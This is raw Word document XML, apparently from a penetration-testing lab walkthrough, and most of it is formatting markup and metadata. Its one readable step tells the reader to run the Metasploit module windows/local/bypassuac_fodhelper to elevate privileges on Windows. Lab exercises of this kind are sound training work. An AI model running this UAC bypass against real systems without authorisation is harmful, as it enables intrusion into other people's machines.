    </w:p>
    <w:p w:rsidR="00FC3F2D" w:rsidRPr="00087724" w:rsidRDefault="00FC3F2D" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:noProof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6692265" cy="5521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06" w:rsidRDefault="00735D06" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009557EC" w:rsidRDefault="009557EC" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing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eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6692265" cy="3293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EC" w:rsidRDefault="009557EC" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009557EC" w:rsidRDefault="009557EC" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009557EC" w:rsidRDefault="009557EC" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009557EC" w:rsidRDefault="009557EC" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009719B6" w:rsidRPr="00E73D69" w:rsidRDefault="009557EC" w:rsidP="009719B6">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 11</w:t>
      </w:r>
      <w:r w:rsidR="00BF7C1B" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00BF7C1B" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009719B6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use /windows/local/bypassuac_fodhelper</w:t>
      </w:r>
      <w:r w:rsidR="002F6032" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to elevate our privilege.</w:t>
      </w:r>
      <w:r w:rsidR="009719B6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009719B6" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Set the variables </w:t>
      </w:r>
      <w:r w:rsidR="009719B6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>then Run the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F6032" w:rsidRPr="00E73D69" w:rsidRDefault="002F6032" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A561B3" w:rsidRPr="00E73D69" w:rsidRDefault="00A561B3" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A561B3" w:rsidRPr="00E73D69" w:rsidRDefault="00A561B3" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A561B3" w:rsidRPr="00E73D69" w:rsidRDefault="00A561B3" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A561B3" w:rsidRPr="00E73D69" w:rsidRDefault="00A561B3" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A561B3" w:rsidRPr="00E73D69" w:rsidRDefault="00A561B3" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A561B3" w:rsidRPr="00E73D69" w:rsidRDefault="00A561B3" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A561B3" w:rsidRPr="00E73D69" w:rsidRDefault="00A561B3" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A561B3" w:rsidRPr="00E73D69" w:rsidRDefault="00A561B3" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002F6032" w:rsidRPr="00E73D69" w:rsidRDefault="002F6032" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B1AEA" w:rsidRPr="00E73D69" w:rsidRDefault="009B1AEA" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="008203A3" w:rsidRPr="00E73D69" w:rsidRDefault="008203A3" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008203A3" w:rsidRPr="00E73D69" w:rsidSect="006F5AFE">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="567" w:right="567" w:bottom="0" w:left="567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22361"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E3E0981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203A3"/>
    <w:rsid w:val="000821F7"/>
    <w:rsid w:val="0008418C"/>
    <w:rsid w:val="00087724"/>
    <w:rsid w:val="00163CEB"/>
    <w:rsid w:val="00182DF3"/>
    <w:rsid w:val="001E415B"/>
    <w:rsid w:val="001F0737"/>
    <w:rsid w:val="002F6032"/>
    <w:rsid w:val="00366E25"/>
    <w:rsid w:val="003A3C54"/>
    <w:rsid w:val="003E1700"/>
    <w:rsid w:val="00425C8E"/>
    <w:rsid w:val="004D7C90"/>
    <w:rsid w:val="004F079D"/>
    <w:rsid w:val="004F6B56"/>
    <w:rsid w:val="005123C3"/>
    <w:rsid w:val="00523796"/>
    <w:rsid w:val="006F5AFE"/>
    <w:rsid w:val="00700BED"/>
    <w:rsid w:val="007033AD"/>
    <w:rsid w:val="00711E3D"/>
    <w:rsid w:val="00735D06"/>
    <w:rsid w:val="008203A3"/>
    <w:rsid w:val="00862F1E"/>
    <w:rsid w:val="008764E9"/>
    <w:rsid w:val="00891435"/>
    <w:rsid w:val="009557EC"/>
    <w:rsid w:val="009719B6"/>
    <w:rsid w:val="009A1D4E"/>
    <w:rsid w:val="009B1AEA"/>
    <w:rsid w:val="009D58CB"/>
    <w:rsid w:val="00A1614E"/>
    <w:rsid w:val="00A23EAC"/>
    <w:rsid w:val="00A561B3"/>
    <w:rsid w:val="00A66CC3"/>
    <w:rsid w:val="00A673FC"/>
    <w:rsid w:val="00B015AA"/>
    <w:rsid w:val="00B27804"/>
    <w:rsid w:val="00B62C4D"/>
    <w:rsid w:val="00BF7C1B"/>
    <w:rsid w:val="00C32C3E"/>
    <w:rsid w:val="00C455AE"/>
    <w:rsid w:val="00C96FEC"/>
    <w:rsid w:val="00D368BB"/>
    <w:rsid w:val="00D90006"/>
    <w:rsid w:val="00DA2A14"/>
    <w:rsid w:val="00DB17E0"/>
    <w:rsid w:val="00DF75F8"/>
    <w:rsid w:val="00E05D88"/>
    <w:rsid w:val="00E107FA"/>
    <w:rsid w:val="00E116E3"/>
    <w:rsid w:val="00E40576"/>
    <w:rsid w:val="00E73D69"/>
    <w:rsid w:val="00E958F5"/>
    <w:rsid w:val="00EB1B5E"/>
    <w:rsid w:val="00EF6AE6"/>
    <w:rsid w:val="00FA2E47"/>
    <w:rsid w:val="00FC3F2D"/>
    <w:rsid w:val="00FD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C83BA"/>
  <w15:docId w15:val="{9D4C7E0D-F8F5-4DFE-82B0-A2DCE4CDB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0737"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="004F6B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B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3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6B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6B5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D4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7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7C90"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-PH"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00163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Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00163C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7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maflucido@gmail.com</dc:creator>
  <cp:lastModifiedBy>Mackoy Lucido</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-27T13:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-09T08:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>